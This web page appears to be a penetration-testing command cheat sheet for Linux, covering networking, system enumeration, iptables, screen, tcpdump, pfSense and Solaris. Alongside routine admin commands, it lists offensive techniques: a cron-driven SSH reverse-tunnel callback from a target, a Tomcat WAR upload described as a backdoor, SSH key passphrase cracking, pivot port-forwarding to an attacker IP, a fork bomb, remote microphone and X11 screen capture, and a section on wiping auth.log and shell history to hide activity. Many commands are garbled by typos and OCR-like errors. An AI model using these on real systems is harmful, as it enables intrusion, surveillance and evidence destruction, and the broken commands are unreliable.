Comment on page



Network commands

watch ss -tp
Network communication
netstat -ant
tcp or udp communication -anu=udp
netstat -tulpn
Communication with PIDs
lsof -i
Established communication
smb:// ip /share
smb shared environment access
share user x.x.x.x c$
Mount the shared Windows environment
smbclient -0 user\ ip \ share
Connect to SMB
ifconfig eth# ip I cidr
Set IP and netmask
ifconfig eth0:1 ip I cidr
Virtual interface setting
route add default gw gw lp
Set GW
ifconfig eth# mtu [size]
Change the MTU size
export MAC=xx: XX: XX: XX: XX: XX
Change the MAC
ifconfig int hw ether MAC
Change the MAC
macchanger -m MAC int
Change Mac in Backtrack
iwlist int scan
Wi-Fi scanner
nc -lvvp port
Listening to a specific port
python3 -m http.server port
Create a web server
dig -x ip
Identifying the domains of an ip
host ip
Identifying the domains of an ip
host -t SRV _ service
Identification of domain SRV
dig @ ip domain -t AXrR
Identify DNS Zone Xfer
host -1 domain namesvr
Identify DNS Zone Xfer
ip xfrm state list
Show available VPN
ip addr add ip I cidr aev ethO
Add ‘hidden’ interface
/var/log/messages I grep DHCP
DHCP list
tcpkill host ip and port port
Blocking ip:port
echo “1” /proc/sys/net/ipv4/ip forward
Enable IP Forwarding
echo ‘‘nameserver x.x.x.x’’ /etc7resolv.conf
Add DNS server
showmount -e ip
Show mounted points
mkdir /site_backups; mount -t nfs ip:/ /site_backup
mount route shared by ip

system information

nbstate -A -ip
Get hostname for ip
Current username
Logged in user
who -a
User information
last -a
The last logged in user
ps -ef
Available system processes (or use top)
df -h
The amount of disk usage (or using free)
uname -a
Show the kernel version along with the processor structure
Mount the file system
getent passwd
Display the list of users
Add variable to PATH
kill pid
Kill process with pid
cat /etc/issue
Display operating system information
cat /etc/’release’
Display operating system version information
cat /proc/version
Display kernel version information
rpm –query -all
Installed packages (in Redhat)
rpm -ivh ‘ .rpm
Installing rpm packages (to remove -e=remove)
dpkg -get-selections
Installed packages (in Ubuntu)
dpkg -I ‘.deb
Install DEB packages (to remove -r=remove)
Installed packages (on Solaris)
which tscsh/csh/ksh/bash
Display the paths of executable files
chmod -so tcsh/csh/ksh
Disabling shell and also forcing to use bash
find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
Finding files with suid
find / -uid 0 -perm -4000 -type f 2>/dev/null
Finding files with suid
find / -writable ! -user whoami -type f ! -path “/proc/” ! -path “/sys/” -exec ls -al {} \; 2>/dev/null
Show writable files

Functional commands

python -c “import pty;pty.spawn(‘/bin/bash’)”
Shell interactive
wget http:// url -0 url.txt -o /dev/null
Get the address
rdesktop ip
Access to desktop ip
scp /tmp/file [email protected]:/tmp/file
Send file
scp user@ remoteip :/tmp/file /tmp/file
Get the file
useradd -m user
added by the user
passwd user
Change user password
rmuser unarne
Delete user
script -a outfile
Loose recording: Ctrl-D to stop
apropos subject
Related commands
History of user commands
! num
Executive lines in history id_rsa > ssh-key
Find the passphrase
john ssh-key
Find the passphrase
ssh -i id_rsa user@ip
Connect with key and passphrase
id -u
Get user id
cut -d: -f3 < <(getent group GROUPNAME)
Get group id
curl -G ‘’ –data-urlencode ‘cmd=echo ssh-rsa AA………..’
Sending information with the get method in curl
curl –user ‘tomcat:$3cureP4s5w0rd123!’ –upload-file exploit.war “
Create backdoor with lfi vulnerability in java

File commands

collection of lines
diff file file2
Compare two files
rm -rf dir
Forced deletion of folders nested
shred -f -u file
Rewrite or delete the file
touch -r ref file
Adapting timestamp related to ref_file
touch -t YYYYMMDDHHSS file
set file timestamp
sudo fdisk -1
List of connected drivers
mount /dev/sda# /mnt/usbkey
Mounting usb devices
md5sum -t file
md5 crisp accounting
echo -n "str" | md5sum
Generate md5 hash
shalsum file
The SHAl hash of the file
sort -u
Relating and displaying unique lines
grep -c ''str'' file
grep -Hnri word * | vim -
Search for the desired word in files along with the file name
grep -rial word
Files containing the desired word
tar cf file.tar files
Create .tar from files
tar xf file.tar
Extract .tar
tar czf file.tar.gz files
Create .tar.gz
tar xzf file.tar.gz
Extract .tar.gz
tar cjf file.tar.bz2 files
Create .tar.bz2
tar xjf file.tar.bz2
Extract .tar.bz2
gzip file
Compress and rename the file
gzip -d file. gz
Not compressing file.gz
upx -9 -o out.exe orig.exe
Get UPX packs related to orig.exe
zip -r \Directory\'
Create zip
dd skip=lOOO count=2000 bs=S if=file of=file
Separate 1 to 3 KB from the file
split -b 9K file prefix
Separation of 9 KB sections from the file
awk 'sub("$"."\r")' unix.txt win.txt
Windows compatible txt file
find -i -name file -type '.pdf
Search for PDF files
find I -perm -4000 -o -perm -2000 -exec ls -
ldb {} \;
Search setuid files
dos2unix file
Switch to *nix format
file file
Determine the file type and format
chattr (+/-)i file
setting or not setting the immutable bit
while [ $? -eq 0 ]; do cd flag/; done
Enter infinite nested folder

Miscellaneous commands

Disable reports in history
ssh user@ ip arecord - I aplay -
Remote microphone recording
gcc -o outfile myfile.c
Compile C, C++
init 6
Restart (0 = shutdown)
cat /etc/ 1 syslog 1 .conf 1 grep -v ‘’”#’’
list of report files
grep ‘href=’ file 1 cut -d”/” -f3 I grep url | sort -u
Separation of links
dd if=/dev/urandom of= file bs=3145728 count=100
Create a 3 MB file

Controller commands

echo “” /var/log/auth.log
Delete the auth.log file
echo ‘’’’ -/.bash history
Delete the session history of the current user
rm -/.bash history/ -rf
Delete the file .bash_history
history -c
Delete the session history of the current user
Setting the maximum lines of the history file to zero
export HISTSIZE=0
Setting the maximum number of commands in the history file to zero
delete history (need to log in again to apply)
kill -9 $$
Delete the current meeting
ln /dev/null -/.bash_historj -sf
Permanently send all history commands to /dev/null

File system structure

System binary files
Files related to the boot process
Interfaces related to system devices
System configuration files
A basic place for users and libraries
Essential software libraries
Executive and systemic processes
The base path for the root user
executable files of the root user
Temporary files
Not very necessary files
System variables file


Hash of local users
Local users
Local groups
Startup services
List of hostnames and IPs
Show hostname along with domain
Network communication
System environment variables
list of ubuntu distribution sources
namserver settings
/horne/ user /.bash history
bash history (also in /root/)
MAC Manufacturer
Location of ssh keystores
System reports file (for Linux)
System reports file (for Unix)
List of files in cron
Apache communication reports
Fixed system information file

Using powershell


sudo apt install gss-ntlmssp
sudo apt-get install powershell

Login using username and password

$offsec_session = New-PSSession -ComputerName -Authentication Negotiate -Credential k.svensson
Enter-PSSession $offsec_session
New-Item -ItemType Junction -Path 'C:\ProgramData' -Target 'C:\Users\Administrator'

Script writing

Create Ping sweep

for x in {1 .. 254 .. l};do ping -c 1 1.1.1.$x lgrep "64 b" lcut -d" "-f4 ips.txt; done

Automating the domain name resolve process in the bash script

echo "Enter Class C Range: i.e. 192.168.3"
read range
for ip in {1 .. 254 .. l}; do
host $range.$ip lgrep " name pointer " lcut -d"

Creating a Fork bomb (Creating a process to crash the system)

: (){:|: & };:

dns reverse lookup process

for ip in {1 .. 254 .. 1}; do dig -x 1.1.1.$ip | grep $ip
dns.txt; done

Do not block Ip script

# This script bans any IP in the /24 subnet for starting at 2
# It assumes 1 is the router and does not ban IPs .20, .21, .22
$i -le 253 l
if [ $i -ne 20 -a $i -ne 21 -a $i -ne 22 ]; then
echo "BANNED: arp -s 192.168.1.$i"
arp -s 192.168.1.$i OO:OO:OO:OO:OO:Oa
echo "IP NOT BANNED: 192.168.1.$i"
i='expr $i +1`

Create SSH Callback

Set up script in crontab to callback every X minutes.
Highly recommend YOU
set up a generic user on red team computer (with no shell privs).
will use the private key (located on callback source computer) to connect
to a public key (on red team computer). Red teamer connects to target via a
local SSH session (in the example below, use #ssh -p4040 localhost)
# Callback: script located on callback source computer (target)
killall ssh /dev/null 2 &1
sleep 5
COUNT=S(ping -c2 $LIVEHOST | grep 'received' | awk -F','{ print $2 } '
| awk ' ( print $1 | ')
if [ [ $COUNT -gt 0 ] ] ; then
ssh -R $(REMLIS}:localhost:22 -i
"/home/$(REMUSR}/.ssh/id rsa" -N $(LIVEHOST} -1 $(REMUSR}

Iptables command

Use iptable for ipv6
iptables-save -c file
Extract iptable rules and save to file
iptables-restore file
retrieving iptables rules
iptables -L -v --line-numbers
List of all rules with their line number
iptables -F
Restart all rules
Policy change if rules are not met
iptables -A INPUT -i interface -m state --state RELATED,ESTABLcSHED -j ACCEPT
Allow connections made on INPUT
iptables -D INPUT 7
Remove 7 layers of inbound rules
iptables -t raw -L -n
Increase productivity by disabling statefulness
iptables -P INPUT DROP
Delete all packets

Allow ssh and port 22 in outbound

iptables -A OUTPUT -o iface -p tcp --dport 22 -m state --state
iptables -A INPUT -i
iface -p tcp --sport 22 -m state --state

Allow ICMP in outband

iptacles -A OUTPUT -i iface -p icmp --icmp-type echo-request -j ACCEPT
iptables -A INPUT -o iface -p icmp --icmp-type echo-reply -j ACCEPT

Create port forward

echo "1" /proc/sys/net/ipv4/lp forward
# OR- sysctl net.ipv4.ip forward=1
iptables -t nat -A PREROUTING -p tcp -i ethO -j DNAT -d pivotip --dport
443 -to-destination attk ip :443
iptables -t nat -A POSTROUTING -p tcp -i eth0 -j SNAT -s target subnet
cidr -d attackip --dport 443 -to-source pivotip
iptables -t filter -I FORWARD 1 -j ACCEPT

Allow and port 80,443 and create log in /var/log/messages

iptables -A INPU~ -s -m state --state RELATED,ESTABLISHED,NEW
-p tcp -m multipart --dports 80,443 -j ACCEPT
iptables -A INPUT -i ethO -m state --state RELATED,ESTABLISHED -j ACCEPT
iptables -P INPUT DROP
iptables -A OUTPUT -o ethO -j ACCEPT
iptables -A INPUT -i lo -j ACCEPT
iptables -A OUTPUT -o lo -j ACCEPT
iptables -N LOGGING
iptables -A INPUT -j LOGGING
iptables -A LOGGING -m limit --limit 4/min -j LOG --log-prefix "DROPPED "
iptables -A LOGGING -j DROP

Update-rc.d file

Check and create launcher
service --status-all
[+] Service starts at boot
[-] Service does not start
service service start
start service
service service stop
stop service
service service status
Check service status
update-rc.d -f service remove
Remove the existing system startup service (-f for the /etc/init.d file if it already exists)
update-rc.d service defaults
Added service in system startup


Available in red hat distributions such as centos and oracle
chkconfig –list
List of available services and implementation status
chkconfig service -list
The status of a service
chkconfig service on [–level 3]
Adding the service [Its layer can also be specified]
chkconfig service off [–level 3] e.g. chkconfig iptables off
Remove the service

Screen command

screen -S name
Create a new screen with the name
screen -ls
List of running screens
screen -r name
Addition to screen with the name
screen -S name -X cmd
Send command to screen with the name
List of key combinations (help)
C-a d
Addition removal
C-a D D
Removal of joining and leaving
C-a c
Create a new window
C-a C-a
Switch to the last window
C-a ‘num|name
Switch to the window named
C-a “
Show window list and changes
C-a k
Delete the current window
C-a S
Horizontal separation of the display
C-a V
Vertical separation of the display
C-a tab
Jump to the last screen
C-a X
Delete the current section
C-a Q
Delete all sections except the current section


Remote recording of X11 window and changing its format to JPG

xwd -display ip :0 -root -out /tmp/test.xpm
xwud -in /tmp/test1.xpm
convert /tmp/test.xpm -resize 1280x1024 /tmp/test.jpg

Open X11 in stream mode

xwd -display -root -silent -out x11dump
Read dumped file with xwudtopnm or GIMP

TCPDump command

Record packets in eth0 and change it from ASCII and hex and save it in the file

tcpdump -i ethO -XX -w out.pcap

Recording of all traffic

tcpdump -i ethO port 80 dst

Show all ip connections

tcpdump -i ethO -tttt dst and not net

Show all ping outputs

tcpdump -i ethO 'icmp[icmptype] == icmp-echoreply'

Record 50 dns packets and display timestamp

tcpdump -i ethO -c 50 -tttt 'udp and port 53'

Kali default commands

Equivalent to WMIC

wmis -U DOMAIN\ user % password //DC cmd.exe /c command

Mount SMB shared space

# Mounts to /mnt/share. For other options besides ntlmssp, man mount.cifs
mount.cifs // ip /share /mnt/share -o


apt-get update
apt-get upgrade

Checking the operating system for the possibility of upgrading access
Example: ./ -s -k keyword -r report -e /tmp/ -t

List of all processes with root access
For example: ./pspy64 -pf -i 1000

The PFSENSE command

Shell pfSense
pfSsh.php playback enableallowallwan
Allowing connections to inbound connections on the WAN (Adding hidden rules to WAN rules )
pfSsh.php playback enablesshd
Enable inbound/outbound ssh
pfctl -sn
Show NAT rules
pfctl -sr
Show filter rules
pfctl -sa
Show all rules
Edit settings
rm /tmp/config.cache
Target cache (or backup) settings after its execution
Reload the entire configuration

SOLARIS operating system

ifconfig -a
List of all interfaces
netstat -in
List of all interfaces
ifconfig -r
List of routes
ifconfig eth0 dhcp
Start DHCP in user
ifconfig eth0 plumb up ip netmask nmask
IP setting
route add default ip
Gateway setting
logins -p
List of users and passwords
svcs -a
List of all services along with status
prstat -a
Status of processes (also command top)
svcadm start ssh
Start the SSH service
inetadm -e telnet (-d for disable)
telnet activation
prtconf I grep Memorj
Total physical memory
iostat -En
Hard disk size
showrev -c /usr/bin/bash
Binary information
shutdown -i6 -g0 -y
Restart the system
List of users connected to NFS
GUI management
snoop -d int -c pkt # -o results.pcap
Packet recording
Mounted system file table
Reports list of login attempts
Default settings
Kernel modules and settings
syslog path
/etc/auto ‘
Automounter settings file
IPv4 and IPv6 hosts files

Important cache files

vim editor file


Situational Awareness

shows real-time system statistics including CPU usage, memory usage, and running processes.
ps aux
displays a list of running processes with their associated details.
displays active network connections, routing tables, and a number of network interface and protocol statistics.
shows all active network connections and which processes are using them.displays a list of running processes with their associated details.
allows the capture and analysis of network traffic.
tail -f /var/log/system.log
displays real-time updates to the macOS system log.
log show –predicate ‘process == “PROCESS_NAME”’ –info
displays system log entries for a specific process.
shows real-time file system activity, including which files are being accessed and by which processes.
displays a graphical representation of file system activity.